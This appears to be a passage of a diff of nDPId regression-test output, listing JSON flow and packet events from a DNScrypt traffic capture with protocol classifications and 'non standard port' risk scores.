+00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304369,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55123,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":32970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00835{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304626,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":56035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":33071,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304396,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59261,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00835{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305191,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":43633,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306433,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":49512,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304367,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":59405,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312103,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":46313,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305350,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":42570,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402187,"flow_last_seen":946739402187,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":59587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":946739402187,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739402187,"pkt":"REREREREZmZmZmZmCABFAAIc1vJAAH4RAOYKAAABF29KzejDAbsCCCUSS8MBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402187,"flow_last_seen":946739402187,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":59587,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402187,"flow_last_seen":946739402187,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":59587,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":573,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60852,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":946739402188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAAIc1vNAAH4RAOUKAAABF29Kze20AbsCCCUSS8UBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60852,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60852,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":574,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":44793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":574,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":946739402188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAAIc1vRAAH4RAOQKAAABF29Kza75AbsCCCUSS8cBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":574,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":44793,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":574,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":44793,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":53045,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":946739402188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAAXc1vYgAH4RHSIKAAABF29Kzc81AbsGBMTJS8YBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":53045,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":53045,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":34024,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":946739402188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAAXc1vUgAH4RHSMKAAABF29KzYToAbsGBA8bS8IBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA